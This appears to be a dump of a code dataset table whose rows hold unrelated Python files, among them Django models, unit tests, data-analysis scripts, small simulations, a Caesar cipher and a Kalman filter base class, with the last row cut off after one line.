index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
983,700 | 5098e0f62db537db9751b5a60e9e49efec65f5e9 | from django.db import models
from django.contrib.auth.models import User
from django.core.exceptions import FieldDoesNotExist
from django.core.validators import (
    MaxLengthValidator,
    MaxValueValidator,
    MinLengthValidator,
    MinValueValidator,
)
# Create your models here.
class Customer(models.Model):
    """Shop customer profile, optionally linked one-to-one to an auth User."""
    user = models.OneToOneField(User, null=True, blank=True, on_delete=models.CASCADE)
    name = models.CharField(max_length=200, null=True)
    # NOTE(review): max_length has no effect on a DateField -- candidate for removal.
    dob = models.DateField(max_length=8, null=True)
    email = models.EmailField(max_length=254)
    phone = models.CharField(max_length=200, null=True)
    profile_pic = models.ImageField(null=True, blank=True)
    bio = models.TextField(default="no bio...", max_length=300)
    price = models.DecimalField(max_digits=7, decimal_places=2, null=True, blank=True)

    def __str__(self):
        return self.name

    @property
    def imageURL(self):
        """URL of the profile picture, or '' when no image is attached.

        Bug fix: this model has no `image` field -- the previous code read
        `self.image`, so the property always raised and returned ''.
        """
        try:
            url = self.profile_pic.url
        except (ValueError, AttributeError):
            # no file attached, or the storage backend cannot build a URL
            url = ''
        return url
class Product(models.Model):
    """Catalogue item: either a supplement (ptype/flavor/manufacture) or a
    prepared food (food_* fields); `digital` items require no shipping."""
    TYPE = (
        ('Bars', 'Bars'),
        ('Drinks', 'Drinks'),
        ('Powder', 'Powder'),
        ('Tablets & Capsules', 'Tablets & Capsules')
    )
    FLAVOR = (
        ('Chocolate', 'Chocolate'),
        ('Snickerdoodle', 'Snickerdoodle'),
        ('Cookies & Cream', 'Cookies & Cream'),
        ('Strawberry', 'Strawberry'),
        ('Vanilla', 'Vanilla'),
        ('Fruits', 'Fruits'),
    )
    MANUFACTURE = (
        ('Kabs', 'Kabs'),
        ('First Nutrition', 'First Nutrition'),
        ('Go Tamreen', 'Go Tamreen'),
        ('Supplements Mall', 'Supplements Mall'),
        ('Protinak', 'Protinak'),
    )
    FOODTYPE = (
        ('Salad', 'Salad'),
        ('Drinks', 'Drinks'),
        ('Protin', 'Protin'),
        ('Carbs', 'Carbs'),
    )
    FOODSIZE = (
        ('20g', '20g'),
        ('50g', '50g'),
        ('80g', '80g'),
        ('100g', '100g'),
        ('150g', '150g'),
        ('200g', '200g'),
    )
    FOODMANUFACTURE = (
        ('Muscle Kitchen', 'Muscle Kitchen'),
        ('Thefitbar', 'Thefitbar'),
        ('Fit Food Factory', 'Fit Food Factory'),
        ('Calories Healthy Food Resturant', 'Calories Healthy Food Resturant'),
        ("OJ's - Super Fast Salads", "OJ's - Super Fast Salads"),
    )
    user = models.ForeignKey(Customer, on_delete=models.SET_NULL, null=True)
    name = models.CharField(max_length=200, null=True, blank=True)
    price = models.DecimalField(max_digits=7, decimal_places=2, null=True, blank=True)
    digital = models.BooleanField(default=False, null=True, blank=True)
    image = models.ImageField(null=True, blank=True)
    ptype = models.CharField(max_length=200, null=True, choices=TYPE)
    flavor = models.CharField(max_length=200, null=True, choices=FLAVOR)
    manufacture = models.CharField(max_length=200, null=True, choices=MANUFACTURE)
    food_type = models.CharField(max_length=200, null=True, choices=FOODTYPE)
    # NOTE(review): field named food_flavor but its choices are FOODSIZE --
    # looks like a size field; renaming would need a migration, so left as-is.
    food_flavor = models.CharField(max_length=200, null=True, choices=FOODSIZE)
    food_manufacture = models.CharField(max_length=200, null=True, choices=FOODMANUFACTURE)
    description = models.TextField(null=True, blank=True)
    rating = models.IntegerField(default=0, validators=[
        # Bug fix: Max/MinLengthValidator measure sequence length and raise a
        # TypeError on ints; value validators are the correct 0..5 bound check.
        MaxValueValidator(5),
        MinValueValidator(0),
    ])
    countInStock = models.IntegerField(null=True, blank=True, default=0)
    createdAt = models.DateTimeField(auto_now_add=False, null=True, blank=True)

    def __str__(self):
        return self.name

    @property
    def imageURL(self):
        """URL of the product image, or '' when no image is attached."""
        try:
            url = self.image.url
        except (ValueError, AttributeError):
            # no file attached, or the storage backend cannot build a URL
            url = ''
        return url
class Review(models.Model):
    """A user's rating and comment attached to a product."""
    product = models.ForeignKey(Product, null=True, on_delete=models.SET_NULL)
    user = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)
    name = models.CharField(max_length=50, null=True, blank=True)
    rating = models.IntegerField(null=True, blank=True, default=0)
    comment = models.TextField(null=True, blank=True)

    def __str__(self):
        return str(self.rating)
class Order(models.Model):
    """A customer's cart/order; the order lines live in related OrderItem rows."""
    customer = models.ForeignKey(Customer, null=True, blank=True, on_delete=models.SET_NULL)
    date_ordered = models.DateTimeField(auto_now_add=True)
    complete = models.BooleanField(default=False)
    transaction_id = models.CharField(max_length=100, null=True)

    def __str__(self):
        return str(self.id)

    @property
    def shipping(self):
        """True when at least one line item is a physical (non-digital) product."""
        return any(
            item.product.digital == False  # noqa: E712 -- digital=None must NOT count as physical
            for item in self.orderitem_set.all()
        )

    @property
    def get_cart_total(self):
        """Sum of the line totals over every item in this order."""
        return sum(item.get_total for item in self.orderitem_set.all())

    @property
    def get_cart_items(self):
        """Total quantity across all items in this order."""
        return sum(item.quantity for item in self.orderitem_set.all())
class OrderItem(models.Model):
    """One product line within an Order."""
    product = models.ForeignKey(Product, null=True, on_delete=models.SET_NULL)
    order = models.ForeignKey(Order, null=True, on_delete=models.SET_NULL)
    quantity = models.IntegerField(default=0, null=True, blank=True)
    date_added = models.DateTimeField(auto_now_add=True)

    @property
    def get_total(self):
        """Line total: unit price * quantity.

        NOTE(review): raises if product is NULL (SET_NULL) or price is None --
        confirm callers guarantee both before relying on this.
        """
        total = self.product.price * self.quantity
        return total
class ShippingAddress(models.Model):
    """Postal destination captured for an order that needs physical shipping."""
    customer = models.ForeignKey(Customer, null=True, on_delete=models.SET_NULL)
    order = models.ForeignKey(Order, null=True, on_delete=models.SET_NULL)
    address = models.CharField(null=True, max_length=200)
    city = models.CharField(null=False, max_length=200)
    zipcode = models.CharField(null=False, max_length=200)
    date_added = models.DateTimeField(auto_now_add=True)

    def __str__(self):
        return self.address
983,701 | 7531bd890cde3b44d6c0aa8395cbb3737f9082bb | # -*- coding: utf-8 -*-
# @Time : 2021/6/4 17:57
# @Author : dujun
# @File : conftest.py
# @describe: 项目脚本配置文件
import pytest
from ..testCaseManage.api_manage.App_addOrder import addOrder
from ..tools.dataBase import DataBase
@pytest.fixture(scope='session')
def mysql():
    """Session-wide database helper shared by all tests."""
    return DataBase()
@pytest.fixture(scope='session')
def addOrd_manege():
    """Session-wide order-creation API client.

    The misspelling 'manege' is kept because tests request the fixture by name.
    """
    return addOrder()
# User account data
@pytest.fixture(scope='session')
def Account_data():
    """Placeholder fixture for account data; not implemented yet."""
    pass
# XinYeBang environment
@pytest.fixture(scope='session')
def xinYe():
    """Order-API client preconfigured with the XinYeBang test phone number."""
    return addOrder(phone='111111111111')
|
n = int(input('Digite um número inteiro: '))
# Bug fix: the old test computed n / 2 and checked .is_integer(); float
# division can misreport parity for integers beyond 2**53. Integer modulo is
# both exact and the idiomatic parity test.
if n % 2 == 0:
    print(f'O número \033[35m{n} \033[34mé par\033[m')
else:
    print(f'O número \033[35m{n} \033[31mé ímpar\033[m')
|
983,703 | 578728a1e96cb9f58994bdfca236d5ede63e77cb | from nn_wtf.neural_network_graph import NeuralNetworkGraph
from .util import MINIMAL_INPUT_SIZE, MINIMAL_OUTPUT_SIZE, MINIMAL_LAYER_GEOMETRY
import tensorflow as tf
import unittest
__author__ = 'Lene Preuss <lene.preuss@gmail.com>'
# pylint: disable=missing-docstring
class NeuralNetworkGraphTest(unittest.TestCase):
    # Exercises NeuralNetworkGraph construction, validation and hidden-layer
    # bookkeeping; the MINIMAL_* size constants come from tests/util.

    def test_init_runs(self):
        NeuralNetworkGraph(MINIMAL_INPUT_SIZE, MINIMAL_LAYER_GEOMETRY, MINIMAL_OUTPUT_SIZE)

    def test_init_fails_on_bad_layer_sizes(self):
        # the layer geometry must be a sequence of sizes, not a bare int
        with self.assertRaises(TypeError):
            NeuralNetworkGraph(2, 2, 2)

    def test_init_fails_if_last_layer_smaller_than_output_size(self):
        with self.assertRaises(ValueError):
            NeuralNetworkGraph(2, (2, 1), 2)

    def test_build_neural_network_runs_only_once(self):
        # a second explicit build must be rejected
        graph = self._create_minimal_graph()
        with self.assertRaises(AssertionError):
            graph._build_neural_network()

    def test_build_neural_network_output(self):
        graph = self._create_minimal_graph()
        self.assertIsInstance(graph.output_layer(), tf.Tensor)
        self.assertEqual(2, graph.output_layer().get_shape().ndims)
        self.assertEqual(MINIMAL_OUTPUT_SIZE, int(graph.output_layer().get_shape()[1]))
        # graph.layers holds two non-hidden layers besides the hidden ones
        self.assertEqual(len(graph.layers)-2, graph.num_hidden_layers)
        self.assertEqual(len(MINIMAL_LAYER_GEOMETRY), graph.num_hidden_layers)

    def test_build_neural_network_output_with_three_layers(self):
        self._check_num_hidden_layers_for_input_is((4, 3, 2), 3)

    def test_build_neural_network_output_with_last_layer_none(self):
        # a None entry in the geometry does not produce a hidden layer
        self._check_num_hidden_layers_for_input_is((4, 3, None), 2)

    def test_build_neural_network_output_with_middle_layer_none(self):
        self._check_num_hidden_layers_for_input_is((4, None, 2), 2)

    def _check_num_hidden_layers_for_input_is(self, definition, expected_size):
        # helper: build a graph from `definition`, assert the hidden-layer count
        graph = NeuralNetworkGraph(MINIMAL_INPUT_SIZE, definition, MINIMAL_OUTPUT_SIZE)
        self.assertEqual(expected_size, graph.num_hidden_layers)

    def _create_minimal_graph(self):
        return NeuralNetworkGraph(MINIMAL_INPUT_SIZE, MINIMAL_LAYER_GEOMETRY, MINIMAL_OUTPUT_SIZE)
|
983,704 | 684767ae293cfd6347ce0f34d9bd41e9306a3214 | import glob
import pandas as pd
import math
import numpy as np
import numbers
# Aggregate the final 'Penalty' value of every matching experiment run into
# one CSV keyed by mutation probability (mp) and population size (ps).
folder = 'test/results_size'
# cp = ['2p']
cp = ['1p', '2p', 'uniform']
# md = ['uniform', 'normal', 'reinit']
md = ['uniform']
mp = ['0.8', '0.2', '0.1', '0.05', '0.02', '0.01']
# mp = ['0.1']
ps = ['10', '30', '50', '70', '90', '110']
# ps = ['10']
# mult = ['1.0', '2.0', '4.0', '8.0', '16.0']
mult = ['1.0']
# fro = ['10', '20']
fro = ['10']
# to = ['100']
to = ['100']
# stats = ['avg', 'best', 'worst']
stats = ['best']
delim = "_"

rframe = pd.DataFrame(columns=['mp', 'ps', 'penalty'])
num = 0
for i in cp:
    for j in md:
        for k in mp:
            for m in ps:
                for mu in mult:
                    for f in fro:
                        for t in to:
                            # e.g. '2p_uniform_0.8_10_1.0_10_100'
                            config = delim.join([i, j, k, m, mu, f, t])
                            filelist = glob.glob(folder + '/' + config + '_SEED*')
                            if len(filelist) == 0:
                                continue
                            print(config)
                            avg = 0
                            cnt = 0
                            for file in filelist:
                                # Bug fix: the path used '\penalty...' (a literal
                                # backslash), which only worked on Windows; use
                                # '/' like the glob pattern above.
                                dt = pd.read_csv(file + '/penalty_steps_best.txt', delim_whitespace=True)
                                if isinstance(dt['Penalty'].iloc[-1], numbers.Number):
                                    avg += dt['Penalty'].iloc[-1]
                                    cnt += 1
                            if cnt == 0:
                                # no numeric rows found: skip instead of ZeroDivisionError
                                continue
                            avg = avg / cnt
                            rframe.loc[num] = [k, m, avg]
                            num += 1
                            print(avg)
rframe.to_csv('mp_ps_iso.csv', sep=' ')
983,705 | 2369d4e6702b5d16144da964615e1b740805c6e5 | import crims.common.logger as logging
import datetime
# import cPickle as pickle
from django.db import models
from django.core.cache import cache
from django.conf import settings
from django.contrib.auth.models import User
from crims.gang.models import Gang
from crims.userprofile.models import UserProfile
class MsgManager(models.Manager):
    """Query helpers for reading a user's messages."""

    def get_by_user(self, user, start=0, end=None, catalog='inbox'):
        """Messages for `user`, newest first; `catalog` is 'inbox' or sent.

        NOTE(review): only the sent view filters is_deleted -- the inbox view
        would also show deleted messages; confirm whether that is intentional.
        `start`/`end` are currently unused (pagination is commented out below).
        """
        if catalog == 'inbox':
            msgs = self.filter(receiver=user)
        else:
            msgs = self.filter(sender=user, is_deleted=False)
        msgs = msgs.filter(is_spam=False, is_invite=False).order_by('-sent_at')
        # TODO: load more in background
        # if end is None:
        #     return msgs[start:start+settings.DEFAULT_MSGS_PER_PAGE]
        # else:
        #     return msgs[start:end]
        return msgs

    def get_unread_count(self, user, last_id):
        # messages that arrived after the last one the user has seen
        return self.filter(receiver=user, is_spam=False, is_invite=False, pk__gt=last_id).count()

    def get_gang_unread_count(self, user, last_id):
        # same as above, restricted to gang broadcasts
        return self.filter(receiver=user, is_spam=False, is_invite=False, is_gang=True, pk__gt=last_id).count()
class MsgSendManager(models.Manager):
    """Delivery helpers: route a message to a single user or a whole gang."""

    def send_to(self, sender, receiver, msg):
        """Deliver `msg` to the user or gang named `receiver`.

        Tries a user lookup first, then a gang lookup; returns False when
        neither exists.
        """
        try:
            user = User.objects.get(username__iexact=receiver)
        except User.DoesNotExist:
            pass
        else:
            return self._send_to_user(sender, user, msg)
        try:
            gang = Gang.objects.get_by_name(name=receiver)
        except Gang.DoesNotExist:
            pass
        else:
            return self._send_to_gang(sender, gang, msg)
        logging.debug('No msg receiver %s' % receiver)
        return False

    def _send_to_user(self, sender, user, txt, gang=False):
        """Persist one Msg row; a leading '@' marks the message non-public."""
        msg = Msg()
        msg.sender = sender
        msg.receiver = user
        msg.is_public = not txt.startswith('@')
        msg.content = txt
        msg.is_gang = gang
        msg.save()
        logging.info('sent message from %s to %s' % (sender, user))
        return True

    def _send_to_gang(self, sender, gang, msg):
        """Fan the message out to every gang member individually."""
        for member in gang.members:
            recipient = User.objects.get(username__iexact=member)
            self._send_to_user(sender, recipient, msg, gang=True)
        return True
class Msg(models.Model):
    """Internal msg"""
    sender = models.ForeignKey(User, related_name='sender')
    receiver = models.ForeignKey(User, related_name='receiver')
    content = models.CharField(max_length=255)
    is_gang = models.BooleanField(default=False)      # delivered via a gang broadcast
    is_invite = models.BooleanField(default=False)
    is_public = models.BooleanField(default=False)    # False when the text started with '@'
    is_notified = models.BooleanField(default=False)
    is_spam = models.BooleanField(default=False)
    is_deleted = models.BooleanField(default=False)
    sent_at = models.DateTimeField(auto_now_add=True)

    # Two managers: Msg.send for delivery helpers, Msg.objects for queries.
    send = MsgSendManager()
    objects = MsgManager()

    class Meta:
        db_table = 'msg'

    def __unicode__(self):
        return "Msg from %s to %s @ %s" % (self.sender, self.receiver, str(self.sent_at))

    def as_spam(self):
        # flag as spam and persist immediately
        self.is_spam = True
        self.save()
|
983,706 | e31b90254ba3e6ed7df255eb91a528a9eb3264b2 | # @see: https://www.analyticsvidhya.com/blog/2017/08/introduction-to-multi-label-classification/
# Multi-label classification walkthrough: problem-transformation methods
# (binary relevance, classifier chain, label powerset) and an adapted
# algorithm (ML-kNN), each scored with subset accuracy.
import scipy
from scipy.io import arff
import pandas as pd

# NOTE(review): hard-coded absolute path -- parameterize before reuse.
data, meta = scipy.io.arff.loadarff('/Users/yangboz/git/AI-Challenge-RTVC/KerasExample/yeast/yeast-train.arff')
df = pd.DataFrame(data)
print(df.head())

# generate a synthetic sparse multi-label dataset
from sklearn.datasets import make_multilabel_classification
X, y = make_multilabel_classification(sparse=True, n_labels=20,
                                      return_indicator='sparse', allow_unlabeled=False)

# using binary relevance: one independent binary classifier per label
from skmultilearn.problem_transform import BinaryRelevance
from sklearn.naive_bayes import GaussianNB
# Bug fix: sklearn.cross_validation was deprecated in 0.18 and removed in
# 0.20; train_test_split now lives in sklearn.model_selection.
from sklearn.model_selection import train_test_split

# initialize binary relevance multi-label classifier
# with a gaussian naive bayes base classifier
classifier = BinaryRelevance(GaussianNB())
# generate data set
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33)
# train
classifier.fit(X_train, y_train)
# predict
predictions = classifier.predict(X_test)
# calculate accuracy
from sklearn.metrics import accuracy_score
print(accuracy_score(y_test, predictions))

# using classifier chain: each classifier also sees the previous labels
from skmultilearn.problem_transform import ClassifierChain
classifier = ClassifierChain(GaussianNB())
classifier.fit(X_train, y_train)
predictions = classifier.predict(X_test)
print(accuracy_score(y_test, predictions))

# label powerset: one multi-class problem over observed label combinations
from skmultilearn.problem_transform import LabelPowerset
classifier = LabelPowerset(GaussianNB())
classifier.fit(X_train, y_train)
predictions = classifier.predict(X_test)
print(accuracy_score(y_test, predictions))

# Adapted algorithm: multi-label k-nearest neighbours
from skmultilearn.adapt import MLkNN
classifier = MLkNN(k=20)
classifier.fit(X_train, y_train)
predictions = classifier.predict(X_test)
print(accuracy_score(y_test, predictions))

# https://medium.com/coinmonks/multi-label-classification-blog-tags-prediction-using-nlp-b0b5ee6686fc
from sklearn.naive_bayes import MultinomialNB
from sklearn.multiclass import OneVsRestClassifier
classifier = OneVsRestClassifier(MultinomialNB())
classifier.fit(X_train, y_train)
predictions = classifier.predict(X_test)
print(accuracy_score(y_test, predictions))
|
983,707 | 4e10924d6ba56c1ff15139f0dbc342abc03000aa | import sensor,packet,AP,event
def packet_generation(STA_list, location, speed, sp_type, arg):
    """Generate 'packet arrival' events for stations reached by an alarm
    spreading outward from `location`.

    STA_list: stations with .x/.y coordinates
    location: (x, y) of the alarm origin
    speed:    propagation speed in m/s (delay is stored in microseconds)
    sp_type:  "All"  -> every station fires
              "Exp"  -> fires with probability exp(-arg * distance)
              "Sq"   -> fires with "probability" sqrt(arg^2 - d^2) inside
                        radius arg (NOTE(review): this is > 1 for most
                        distances, so it almost always fires -- confirm model)
    Returns (events, count).
    """
    import math, random
    assert sp_type == "All" or sp_type == "Exp" or sp_type == "Sq"
    packet_generation_events = []
    counter = 0
    x = location[0]
    y = location[1]
    for each in STA_list:
        distance = math.sqrt((each.x - x) ** 2 + (each.y - y) ** 2)
        # Decide whether this station receives the alarm; exactly one branch
        # matches, and the RNG is consulted once per station for Exp/Sq,
        # matching the original behaviour.
        if sp_type == "All":
            triggered = True
        elif sp_type == "Exp":
            triggered = random.random() <= math.exp(-arg * distance)
        else:  # "Sq"
            if distance < arg:
                probability = math.sqrt(arg ** 2 - distance ** 2)
            else:
                probability = 0
            triggered = random.random() <= probability
        if triggered:
            # arrival delayed by the propagation time, in microseconds
            new_event = event.event("packet arrival", start_time=(distance / speed * 10 ** 6))
            new_event.register_STA(each)
            packet_generation_events.append(new_event)
            counter += 1
    print("packet amount=" + str(counter))
    return packet_generation_events, counter
def STA_generation(amount, radius, RTS_enable, CWmin, CWmax, system_AP):
    """Scatter `amount` sensor stations uniformly over a disc of given radius,
    assigning AIDs 1..amount."""
    import math, random
    stations = []
    for aid in range(1, amount + 1):
        theta = random.random() * 2 * math.pi
        # sqrt of the uniform draw keeps the areal density uniform
        rho = math.sqrt(random.random()) * radius
        position = [rho * math.cos(theta), rho * math.sin(theta)]
        stations.append(sensor.sensor(aid, CWmin, CWmax, position, RTS_enable, False, system_AP))
    return stations
radius = 1000
RTS_enable = True
CWmin = 16
# Bug fix: the original read 16*2^5, but '^' is XOR in Python, giving
# (16*2)^5 == 37. The intended contention-window maximum is 16*2**5 == 512.
CWmax = 16 * 2 ** 5
import math, random
alpha = random.random() * 2 * math.pi
r = math.sqrt(random.random()) * radius
x = r * math.cos(alpha)
y = r * math.sin(alpha)
print(x, y)
amount = 500  # the number of STAs
system_AP = AP.AP([0, 0], STA_list=[])
STA_list = STA_generation(amount, radius, RTS_enable, CWmin, CWmax, system_AP)
import pickle
for d_max in range(400, 1601, 300):  # the radius of the affected area
    print(amount, d_max)
    system_AP.STA_list = STA_list
    # persist the station layout for this run ('with' guarantees the file closes)
    with open("station_list_amount=" + str(amount) + "_d_max=" + str(d_max) + ".pkl", "wb") as file:
        pickle.dump(amount, file)
        for each in STA_list:
            pickle.dump(each.x, file)
            pickle.dump(each.y, file)
    # generate and persist the packet-arrival events for this radius
    [packet_events, packet_amount] = packet_generation(STA_list, [x, y], 4000, "Sq", d_max)
    with open("packet_events_amount=" + str(amount) + "_d_max=" + str(d_max) + ".pkl", "wb") as file:
        pickle.dump(packet_amount, file)
        for each in packet_events:
            pickle.dump(each.time, file)
            pickle.dump(each.STA_list[0].AID, file)
983,708 | 20cac9c19aaa8924d5a0a65b0874b4318877867f | import turtle
pen = turtle.Turtle()
pen.shape('turtle')
pen.width(3)
pen.color('blue')

# Draw an Archimedean-style spiral: every step is a constant 5-degree turn
# with a step length that grows linearly with the step index.
TURN_DEG = 5
for step in range(1, 300):
    pen.forward(TURN_DEG * 3.142 / 180 * step)
    pen.left(TURN_DEG)
|
983,709 | 33260b531638434f3893262cf082051c327a6d8d | """ Solution for exercise 8.12 from Think Python.
Author: Aliesha Garrett
"""
def rotate_word(s, i):
    """'Rotate' each letter in a word `i` places through the alphabet (Caesar
    cipher), wrapping around; case is preserved and non-letters pass through
    unchanged.

    Bug fix: the original branch chain used strict inequalities, so the
    boundary letters 'A', 'Z', 'a' and 'z' matched no branch and were emitted
    using a stale (or undefined) value from the previous iteration.

    s: string
    i: integer shift (may be negative or larger than 26)
    """
    i = i % 26  # normalise the shift once; Python's % keeps it in 0..25
    word = ''
    for char in s:
        old = ord(char)
        if 65 <= old <= 90:       # uppercase A-Z
            fixed = (old - 65 + i) % 26 + 65
        elif 97 <= old <= 122:    # lowercase a-z
            fixed = (old - 97 + i) % 26 + 97
        else:                     # digits, punctuation, whitespace: unchanged
            fixed = old
        word = word + chr(fixed)
    return word
# NOTE: Python 2 print statements -- this file predates Python 3.
print rotate_word('cheer',7)
print rotate_word('melon',-10)
print rotate_word('sleep',9)
|
983,710 | 498b9a40d85aed5d74add84899148811041d22d2 | """Private module; avoid importing from directly.
"""
import abc
import fannypack as fp
import torch
from overrides import overrides
from .. import types
from ._dynamics_model import DynamicsModel
from ._filter import Filter
from ._kalman_filter_measurement_model import KalmanFilterMeasurementModel
class KalmanFilterBase(Filter, abc.ABC):
    """Base class for a generic Kalman-style filter. Parameterizes beliefs with a mean
    and covariance.

    Subclasses should override `_predict_step()` and `_update_step()`.
    """

    def __init__(
        self,
        *,
        dynamics_model: DynamicsModel,
        measurement_model: KalmanFilterMeasurementModel,
        **unused_kwargs,  # For type checking
    ):
        super().__init__(state_dim=dynamics_model.state_dim)

        # Check submodule consistency
        assert isinstance(dynamics_model, DynamicsModel)
        assert isinstance(measurement_model, KalmanFilterMeasurementModel)

        # Assign submodules
        self.dynamics_model = dynamics_model
        """torchfilter.base.DynamicsModel: Forward model."""
        self.measurement_model = measurement_model
        """torchfilter.base.KalmanFilterMeasurementModel: Measurement model."""

        # Protected attributes for posterior distribution: these should be accessed
        # through the public `.belief_mean` and `.belief_covariance` properties
        #
        # `_belief_covariance` is unused for square-root filters
        self._belief_mean: torch.Tensor
        self._belief_covariance: torch.Tensor

        # Throw an error if our filter is used before `.initialize_beliefs()` is called
        self._initialized = False

    @overrides
    def forward(
        self,
        *,
        observations: types.ObservationsTorch,
        controls: types.ControlsTorch,
    ) -> types.StatesTorch:
        """Kalman filter forward pass, single timestep.

        Args:
            observations (dict or torch.Tensor): Observation inputs. Should be either a
                dict of tensors or tensor of shape `(N, ...)`.
            controls (dict or torch.Tensor): Control inputs. Should be either a dict of
                tensors or tensor of shape `(N, ...)`.

        Returns:
            torch.Tensor: Predicted state for each batch element. Shape should
            be `(N, state_dim).`
        """
        # Check initialization
        assert self._initialized, "Kalman filter not initialized!"

        # Validate inputs: batch sizes must match the current belief
        N, state_dim = self.belief_mean.shape
        assert fp.utils.SliceWrapper(observations).shape[0] == N
        assert fp.utils.SliceWrapper(controls).shape[0] == N

        # Predict step (time update implemented by the subclass)
        self._predict_step(controls=controls)

        # Update step (measurement update implemented by the subclass)
        self._update_step(observations=observations)

        # Return mean
        return self.belief_mean

    @overrides
    def initialize_beliefs(
        self, *, mean: types.StatesTorch, covariance: types.CovarianceTorch
    ) -> None:
        """Set filter belief to a given mean and covariance.

        Must be called once before the first `forward()` pass.

        Args:
            mean (torch.Tensor): Mean of belief. Shape should be `(N, state_dim)`.
            covariance (torch.Tensor): Covariance of belief. Shape should be
                `(N, state_dim, state_dim)`.
        """
        N = mean.shape[0]
        assert mean.shape == (N, self.state_dim)
        assert covariance.shape == (N, self.state_dim, self.state_dim)
        self.belief_mean = mean
        self.belief_covariance = covariance
        self._initialized = True

    @property
    def belief_mean(self) -> types.StatesTorch:
        """Posterior mean. Shape should be `(N, state_dim)`."""
        return self._belief_mean

    @belief_mean.setter
    def belief_mean(self, mean: types.StatesTorch):
        self._belief_mean = mean

    @property
    def belief_covariance(self) -> types.CovarianceTorch:
        """Posterior covariance. Shape should be `(N, state_dim, state_dim)`."""
        return self._belief_covariance

    @belief_covariance.setter
    def belief_covariance(self, covariance: types.CovarianceTorch):
        self._belief_covariance = covariance

    @abc.abstractmethod
    def _predict_step(self, *, controls: types.ControlsTorch) -> None:
        r"""Kalman filter predict step.

        Computes $\mu_{t | t - 1}$, $\Sigma_{t | t - 1}$ from $\mu_{t - 1 | t - 1}$,
        $\Sigma_{t - 1 | t - 1}$.

        Keyword Args:
            controls (dict or torch.Tensor): Control inputs.
        """

    @abc.abstractmethod
    def _update_step(self, *, observations: types.ObservationsTorch) -> None:
        r"""Kalman filter measurement update step.

        Nominally, computes $\mu_{t | t}$, $\Sigma_{t | t}$ from $\mu_{t | t - 1}$,
        $\Sigma_{t | t - 1}$.

        Updates `self.belief_mean` and `self.belief_covariance`.

        Keyword Args:
            observations (dict or torch.Tensor): Observation inputs.
        """
|
983,711 | 556ec8c3287edaa1dfec4deb37ea0b17d31f80f1 | import numpy as np
import matplotlib.pyplot as plt
def pdf(costh, P_mu):
    """Angular probability density f(cos θ) = 0.5 * (1 - P_mu * cos θ / 3)."""
    return 0.5 * (1.0 - 1.0 / 3.0 * P_mu * costh)


def acc_rej(N_measurements, P_mu):
    """Draw cos θ samples from `pdf` via acceptance-rejection sampling.

    Proposes uniform candidates on [-1, 1] and keeps those whose uniform
    "height" falls under the curve, so the result length is <= N_measurements.
    """
    candidates = np.random.uniform(-1.0, 1.0, size=N_measurements)
    grid = np.linspace(-1.0, 1.0, 1000)
    envelope = np.amax(pdf(grid, P_mu))  # height of the rejection envelope
    heights = np.random.uniform(0, envelope, size=N_measurements)
    # boolean mask keeps only the accepted candidates
    return candidates[heights < pdf(candidates, P_mu)]
P_mu = 0.5
N_measurements_max = 10000000
P_mu_est = np.array([])
data_N_measurements = np.array([])
# Sweep the sample size and record the polarization estimate at each size.
for N_measurements in np.arange(1, N_measurements_max+10000, 10000):
    data_pdf = acc_rej(N_measurements, P_mu)
    mean = np.mean(data_pdf)
    # For this pdf, E[cos theta] = -P_mu / 9, so -9 * mean inverts the moment.
    P_mu_est = np.append(P_mu_est, -9. * mean)
    data_N_measurements = np.append(data_N_measurements, N_measurements)
    print(N_measurements)
# cache the sweep so the plot can be regenerated without resampling
np.save("P_mu_est", P_mu_est)
np.save("data_N_measurements", data_N_measurements)
P_mu_est = np.load("P_mu_est.npy")
data_N_measurements = np.load("data_N_measurements.npy")
# estimator trace vs. the true value
plt.plot(data_N_measurements, P_mu_est, "k", linewidth=0.5, label=r"$\hat{P}_\mu$")
plt.plot([1, N_measurements_max], [P_mu, P_mu], "orange", linestyle='-', linewidth=1.0, label=r"$P_\mu$")
plt.xlabel(r"$N_{events}$")
plt.ylabel(r'$\hat{P}_\mu}$')
plt.xlim(1, N_measurements_max)
plt.ylim(0.46, 0.54)
plt.legend(loc="best")
leg = plt.legend()
leg.get_frame().set_edgecolor('black')
# plt.savefig(r"C:\Users\Aleix López\Desktop\acc_rej.jpg")
plt.show()
|
983,712 | a41891c197442a56ffabc1820a890b3360d92660 | # -*- coding: utf-8 -*-
from radish import before
@before.each_scenario
def init_numbers(scenario):
    """Reset per-scenario state: an empty user list and a stub database object.

    Fix: the original initialized `database.users` three times (setattr plus
    two direct assignments); one assignment yields the identical final state.
    """
    scenario.context.users = []
    # a bare lambda serves as a cheap attribute container for the fake DB
    scenario.context.database = lambda: None
    scenario.context.database.users = []
|
983,713 | 14ad451ea530b28f3a39a718d29a4db2dcbdcee2 | from sys import stdin
from math import floor
def solution(N, M, K, balls):
    """Simulate K rounds of moving/merging balls on an N x N torus and return
    the total remaining mass.

    Each ball is (row, col, mass, speed, direction); directions 0-7 index the
    eight compass deltas. Balls landing on the same cell merge: the combined
    mass is divided by 5 and split over four balls whose directions are all
    even or all odd depending on whether the colliding directions shared
    parity; mass-0 merges vanish.
    """
    DIRS = ((-1, 0), (-1, 1), (0, 1), (1, 1), (1, 0), (1, -1), (0, -1), (-1, -1))
    # switch from the 1-based input coordinates to 0-based, once, up front
    balls = [(b[0] - 1, b[1] - 1, *b[2:]) for b in balls]
    for _ in range(K):
        landed = {}
        for row, col, mass, speed, direction in balls:
            dr, dc = DIRS[direction]
            dest = ((row + speed * dr) % N, (col + speed * dc) % N)
            landed.setdefault(dest, []).append((mass, speed, direction))
        next_balls = []
        for (row, col), group in landed.items():
            if len(group) == 1:
                next_balls.append((row, col, *group[0]))
                continue
            mass_sum = sum(m for m, _, _ in group)
            speed_sum = sum(s for _, s, _ in group)
            parities = [d % 2 for _, _, d in group]
            new_mass = floor(mass_sum / 5)
            new_speed = floor(speed_sum / len(group))
            same_parity = all(p == parities[0] for p in parities)
            new_dirs = (0, 2, 4, 6) if same_parity else (1, 3, 5, 7)
            if new_mass != 0:
                for d in new_dirs:
                    next_balls.append((row, col, new_mass, new_speed, d))
        balls = next_balls
    return sum(b[2] for b in balls)
# Input format: first line "N M K", then M lines "row col mass speed dir".
lexer = lambda: list(map(int, stdin.readline().strip().split(' ')))
N, M, K = lexer()
balls = [lexer() for _ in range(M)]
print(solution(N, M, K, balls))
|
983,714 | dbdc7405ce3109ca374683f4c7057c50a6cb257f | from matplotlib import animation
